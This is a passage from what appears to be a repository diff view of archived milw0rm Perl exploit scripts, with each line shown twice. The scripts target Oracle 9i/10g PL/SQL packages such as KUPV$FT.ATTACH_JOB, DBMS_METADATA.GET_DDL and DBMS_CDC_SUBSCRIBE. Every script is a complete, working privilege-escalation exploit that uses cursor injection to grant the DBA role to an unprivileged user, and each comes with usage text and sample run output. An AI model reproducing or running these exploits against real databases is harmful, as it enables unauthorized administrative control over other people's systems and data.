SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]

272
platforms/multiple/remote/3376.pl
View file

@ -1,136 +1,136 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) # Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/bid/16294 # REF: http://www.securityfocus.com/bid/16294
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007 # DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31626: job does not exist # DBD::Oracle::st execute failed: ORA-31626: job does not exist
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 # ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79
# ORA-06512: at "SYS.KUPV$FT", line 330 # ORA-06512: at "SYS.KUPV$FT", line 330
# ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user # ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user
# ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible # ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible
# ORA-00942: table or view does not exist # ORA-00942: table or view does not exist
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE # DECLARE
# J BOOLEAN; R NUMBER; # J BOOLEAN; R NUMBER;
# BEGIN # BEGIN
# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J); # R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J);
# END; # END;
# "] at kupv-ft_attach_jobV2.pl line 100. # "] at kupv-ft_attach_jobV2.pl line 100.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
DECLARE DECLARE
J BOOLEAN; R NUMBER; J BOOLEAN; R NUMBER;
BEGIN BEGIN
R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J); R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J);
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]

268
platforms/multiple/remote/3377.pl
View file

@ -1,134 +1,134 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g) # Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/bid/16287 # REF: http://www.securityfocus.com/bid/16287
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007 # DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL # DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL
# ORA-06512: at "SYS.DBMS_METADATA", line 2576 # ORA-06512: at "SYS.DBMS_METADATA", line 2576
# ORA-06512: at "SYS.DBMS_METADATA", line 2627 # ORA-06512: at "SYS.DBMS_METADATA", line 2627
# ORA-06512: at "SYS.DBMS_METADATA", line 4220 # ORA-06512: at "SYS.DBMS_METADATA", line 4220
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE # DECLARE
# R CLOB; # R CLOB;
# BEGIN # BEGIN
# R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''',''); # R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''','');
# END; # END;
# "] at dbms_meta_get_ddlV2.pl line 101. # "] at dbms_meta_get_ddlV2.pl line 101.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
DECLARE DECLARE
R CLOB; R CLOB;
BEGIN BEGIN
R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''',''); R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''','');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]

258
platforms/multiple/remote/3378.pl
View file

@ -1,129 +1,129 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g) # Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/archive/1/396133 # REF: http://www.securityfocus.com/archive/1/396133
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007 # DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# #
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist # DBD::Oracle::st execute failed: ORA-31425: subscription does not exist
# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37 # ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN # BEGIN
# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||'''); # SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||''');
# END; # END;
# "] at dbms_cdc_subscribeV2.pl line 122. # "] at dbms_cdc_subscribeV2.pl line 122.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
BEGIN BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||'''); SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||''');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]

256
platforms/multiple/remote/3584.pl
View file

@ -1,128 +1,128 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle KUPM$MCP.MAIN exploit (10g) # Remote Oracle KUPM$MCP.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed! # - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.red-database-security.com/ # REF: http://www.red-database-security.com/
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007 # DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# #
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104. # DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874 # DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN # BEGIN
# SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--',''); # SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END; # END;
# "] at kupm-mcpmainV2.pl line 134. # "] at kupm-mcpmainV2.pl line 134.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
